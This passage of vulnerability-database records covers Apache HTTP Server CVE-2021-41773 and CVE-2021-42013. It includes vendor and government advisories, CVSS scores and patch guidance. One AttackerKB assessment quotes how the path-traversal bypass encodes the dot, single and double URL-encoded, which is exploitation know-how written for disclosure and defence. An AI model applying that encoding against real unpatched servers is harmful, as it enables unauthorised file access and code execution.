Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "attackerkb", "title": "Apache HTTPd 2.4.49/2.4.50 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T00:00:00", "id": "AKB:61971866-F0B5-4317-8AF4-C4E4C23279F1", "href": "https://attackerkb.com/topics/WzgBXAx8tH/apache-httpd-2-4-49-2-4-50", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T15:17:49", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n<https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html>\n\n \n**Recent assessments:** \n \n**noraj** at March 31, 2022 6:44pm UTC reported:\n\nQualys says:\n\n> CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n> \n> The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same was double URL encoded into %%32%65 for version 2.4.50\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70", "href": "https://attackerkb.com/topics/OClg2d2nSp/cve-2021-42013-path-traversal-and-remote-code-execution-in-apache-http-server-2-4-49-and-2-4-50-incomplete-fix-of-cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2023-02-09T14:00:22", "description": "_(Updated October 7, 2021)_\n\nApache has released additional fixes for CVE-2021-41773, which is tracked as [CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>). For more information see the [Apache vulnerabilities page](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>). \n\n_(Originally published October 6, 2021)_\n\nThe Apache Software Foundation has released Apache HTTP Server version 2.4.50 to address two vulnerabilities. An attacker could exploit these vulnerabilities to take control of an affected system. One vulnerability, [CVE-2021-41773](<https://vulners.com/cve/CVE-2021-41773>), has been exploited in the wild. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Apache HTTP Server 2.4.50 vulnerabilities page](<https://httpd.apache.org/>) and apply the necessary update.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "cisa", "title": "Apache Releases Security Update for Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:78B08801DAA7C3B8A2D34A5790730C76", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:26:07", "description": "On October 7, 2021, the Apache Software Foundation released [Apache HTTP Server version 2.4.51](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) to address Path Traversal and Remote Code Execution vulnerabilities (CVE-2021-41773, CVE-2021-42013) in Apache HTTP Server 2.4.49 and 2.4.50. These vulnerabilities have been exploited in the wild. \n\nCISA is also seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation. CISA urges organizations to [patch](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) immediately if they haven\u2019t already\u2014this cannot wait until after the holiday weekend.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "cisa", "title": "Apache Releases HTTP Server version 2.4.51 to Address Vulnerabilities Under Exploitation ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:76FE595B1B89D06301E16CB8087D39BD", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-10-05T20:51:36", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-07T16:15:00", "type": "osv", "title": "CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "id": "OSV:CVE-2021-42013", "href": "https://osv.dev/vulnerability/CVE-2021-42013", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-11-16T00:20:01", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T09:15:00", "type": "osv", "title": "CVE-2021-41773", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-16T00:19:58", "id": "OSV:CVE-2021-41773", "href": "https://osv.dev/vulnerability/CVE-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:46", "description": "A directory traversal vulnerability exists in Apache HTTP Server. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "checkpoint_advisories", "title": "Apache HTTP Server Directory Traversal (CVE-2021-41773; CVE-2021-42013)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-18T00:00:00", "id": "CPAI-2021-0749", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-10-26T20:35:58", "description": "In late September of 2021, a path traversal and file disclosure vulnerability was disclosed and reported as CVE-2021-41773 in Apache HTTP Server version 2.4.29. Both Windows and Linux servers are affected.\n\nThis vulnerability, which occurs via remote code execution (RCE), exposes a path traversal bug and allows attackers to access and read arbitrary files on the server, including sensitive system files, source code, and more. This unauthorized access could not only leak confidential user data, but could provide the information needed to plan more additional zero-day or ransomware attacks in the future and lead to a full system compromise.\n\nOn October 4th, just days after it was originally reported, Apache released a fix with an update to 2.4.50, and urged users to deploy this patch. However upon further investigation, this patch was found to be insufficient resulting in an additional patch bumping the version number to 2.4.51 on October 7th (CVE-2021-42013). It is unclear whether or not the new patch has fully corrected the vulnerability.\n\nLuckily, enterprises that have [RASP protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) installed on their servers already have protections available that prevent Path Traversal attacks, thereby safeguarding systems from vulnerabilities like CVE-2021-42013 and others like it.\n\nTo verify this protection is enabled in the suite of [RASP security protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>), simply navigate to the RASP Management Console and select the desired configuration file. Scroll through the various security protections until reaching the Path Traversal module, then update any settings as desired to adjust the security levels. The updated configuration file can be copied onto the server, and updated protections will be in effect within 60 seconds.\n\nRASP can also be easily installed and configured on additional devices and servers as needed to offer full protection against these vulnerabilities and hackers, as Apache recognizes these vulnerabilities are being actively exploited by bad actors.\n\nFor more information, please contact RASP Technical Support at [support@rasp.imperva.com](<mailto:support@rasp.imperva.com>) or ask for a RASP demo via <https://docs.imperva.com/bundle/rasp-overview/page/73763.htm>\n\nThe post [How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)](<https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {}, "published": "2021-10-26T19:35:24", "type": "impervablog", "title": "How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-26T19:35:24", "id": "IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F", "href": "https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-11-27T06:38:53", "description": "Arch Linux Security Advisory ASA-202110-1\n=========================================\n\nSeverity: Critical\nDate : 2021-10-21\nCVE-ID : CVE-2021-42013\nPackage : apache\nType : directory traversal\nRemote : Yes\nLink : https://security.archlinux.org/AVG-2450\n\nSummary\n=======\n\nThe package apache before version 2.4.51-1 is vulnerable to directory\ntraversal.\n\nResolution\n==========\n\nUpgrade to 2.4.51-1.\n\n# pacman -Syu \"apache>=2.4.51-1\"\n\nThe problem has been fixed upstream in version 2.4.51.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives. If files outside of these directories are not protected by\nthe usual default configuration \"require all denied\", these requests\ncan succeed. If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution. This issue only affects\nApache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nImpact\n======\n\nA remote attacker could trick the HTTP server into executing arbitrary\nexecutables in its file system through path traversal.\n\nReferences\n==========\n\nhttps://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013\nhttps://twitter.com/roman_soft/status/1446252280597078024\nhttps://github.com/icing/blog/blob/main/httpd-2.4.50.md\nhttps://svn.apache.org/viewvc?view=revision&revision=1893971\nhttps://security.archlinux.org/CVE-2021-42013", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:00:00", "type": "archlinux", "title": "[ASA-202110-1] apache: directory traversal", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T00:00:00", "id": "ASA-202110-1", "href": "https://security.archlinux.org/ASA-202110-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nThe Apache http server project reports:\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\n\t Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n\t (CVE-2021-42013).\nIt was found that the fix for CVE-2021-41773 in Apache HTTP\n\t Server 2.4.50 was insufficient. An attacker could use a path\n\t traversal attack to map URLs to files outside the directories\n\t configured by Alias-like directives.\nIf files outside of these directories are not protected by the\n\t usual default configuration \"require all denied\", these requests\n\t can succeed. If CGI scripts are also enabled for these aliased\n\t pathes, this could allow for remote code execution.\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n\t earlier versions.\nAcknowledgements: Reported by Juan Escobar from Dreamlab\n\t Technologies, Fernando Munoz from NULL Life CTF Team, and\n\t Shungo Kumasaka\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "freebsd", "title": "Apache httpd -- Path Traversal and Remote Code Execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "D001C189-2793-11EC-8FB1-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:15:19", "description": "A flaw was found in a change made to path normalization in Apache HTTP\nServer 2.4.49. An attacker could use a path traversal attack to map URLs to\nfiles outside the directories configured by Alias-like directives. If files\noutside of these directories are not protected by the usual default\nconfiguration \"require all denied\", these requests can succeed. If CGI\nscripts are also enabled for these aliased pathes, this could allow for\nremote code execution. This issue is known to be exploited in the wild.\nThis issue only affects Apache 2.4.49 and not earlier versions. The fix in\nApache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T00:00:00", "id": "UB:CVE-2021-41773", "href": "https://ubuntu.com/security/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:15:14", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50\nwas insufficient. An attacker could use a path traversal attack to map URLs\nto files outside the directories configured by Alias-like directives. If\nfiles outside of these directories are not protected by the usual default\nconfiguration \"require all denied\", these requests can succeed. If CGI\nscripts are also enabled for these aliased pathes, this could allow for\nremote code execution. This issue only affects Apache 2.4.49 and Apache\n2.4.50 and not earlier versions.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Ubuntu wasn't vulnerable to CVE-2021-41773 so we did not deploy the insufficient fix.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "ubuntucve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "UB:CVE-2021-42013", "href": "https://ubuntu.com/security/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-28T01:50:15", "description": "## Summary\n\nIBM Rational Build Forge version 8.0.x is affected by CVE-2021-42013\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>) \n** DESCRIPTION: **Apache HTTP Server could allow a remote attacker to execute arbitrary code on the system caused by a path traversal vulnerability related to an incomplete fix for CVE-2021-41773 when mod_cgi is enabled. By uploading a file and setting permissions, an attacker could exploit this vulnerability to execute arbitrary code on the system with Apache user privileges. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/210764](<https://exchange.xforce.ibmcloud.com/vulnerabilities/210764>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nBuild Forge| 8.0 - 8.0.0.20 \n \n\n\n## Remediation/Fixes\n\nYou must download the fix pack specified in the following table and apply it. \n\n**Affected Supporting Product(s)**\n\n| \n\n**Remediation/Fix** \n \n---|--- \n \nIBM Rational Build Forge 8.0 to 8.0.0.20\n\n| \n\n[Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Build+Forge&fixids=RationalBuildForge-8.0.0.21&source=SAR> \"Download\" ) IBM Rational Build Forge 8.0.0.21.\n\nThe fix includes Apache-HTTP-Server-2.4.52 \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-17T18:38:24", "type": "ibm", "title": "Security Bulletin: IBM Rational Build Forge 8.0.x is affected by Apache HTTP Server version used in it. (CVE-2021-42013)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-17T18:38:24", "id": "B0C070EA4747AEFBB7DD852AD2FEB1C85461D6FC3CC95192FD2B7703C8D3DCB2", "href": "https://www.ibm.com/support/pages/node/6541330", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-01T10:46:09", "description": "This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 